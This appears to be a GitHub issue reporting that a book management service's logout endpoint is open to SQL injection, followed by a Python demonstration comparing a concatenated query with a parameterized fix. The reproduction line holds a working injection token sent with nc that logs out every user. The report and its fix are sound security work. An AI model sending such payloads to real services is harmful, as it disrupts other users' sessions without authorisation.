Open STommydx opened 4 years ago
Description Force others to log out with SQL injection
To reproduce
echo -e 'GET /BookManagementService/logout?token=y"\tOR\t""\tLIKE\t" HTTP/1.1 \r\n' | nc localhost 8080
Expected
409 Conflict
What actually happened
200 OK
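The reported behaviour and its fix, as an added example that is not part of the original report or the project's code: the token from the reproduction is run through a concatenated query and a parameterized one. The `sessions` table, its columns, the function names and the use of SQLite are assumptions made for illustration; the 200/409 mapping follows the report.

```python
import sqlite3

# Token exactly as the reproduction sends it (echo -e turns \t into tabs).
REPORTED_TOKEN = 'y"\tOR\t""\tLIKE\t"'

def new_db():
    """Constructed in-memory stand-in for the service's session store."""
    db = sqlite3.connect(":memory:")
    # Treat "..." as a string literal when it names no column, which is what
    # the double quotes in the reported token rely on (explicit on 3.12+).
    if hasattr(db, "setconfig"):
        db.setconfig(sqlite3.SQLITE_DBCONFIG_DQS_DML, True)
    db.execute("CREATE TABLE sessions (user TEXT, token TEXT)")
    db.executemany("INSERT INTO sessions VALUES (?, ?)",
                   [("alice", "tok-a1"), ("bob", "tok-b2")])  # constructed rows
    return db

def logout_concat(db, token):
    """Assumed vulnerable shape: the token is pasted into the SQL text."""
    cur = db.execute('DELETE FROM sessions WHERE token="' + token + '"')
    return 200 if cur.rowcount > 0 else 409

def logout_param(db, token):
    """Hardened shape: the token is bound as data and never parsed as SQL."""
    cur = db.execute("DELETE FROM sessions WHERE token = ?", (token,))
    return 200 if cur.rowcount > 0 else 409

def remaining(db):
    """Number of sessions still stored."""
    return db.execute("SELECT COUNT(*) FROM sessions").fetchone()[0]

def demo():
    """Return {variant: (status, sessions left)} for the reported token."""
    results = {}
    for name, fn in (("concat", logout_concat), ("param", logout_param)):
        db = new_db()
        results[name] = (fn(db, REPORTED_TOKEN), remaining(db))
    return results

if __name__ == "__main__":
    print(demo())
```

With the concatenated query the WHERE clause becomes `token="y" OR "" LIKE ""`, which is true for every row, so all sessions are removed and the handler reports success; the bound parameter is compared as one literal string and matches nothing.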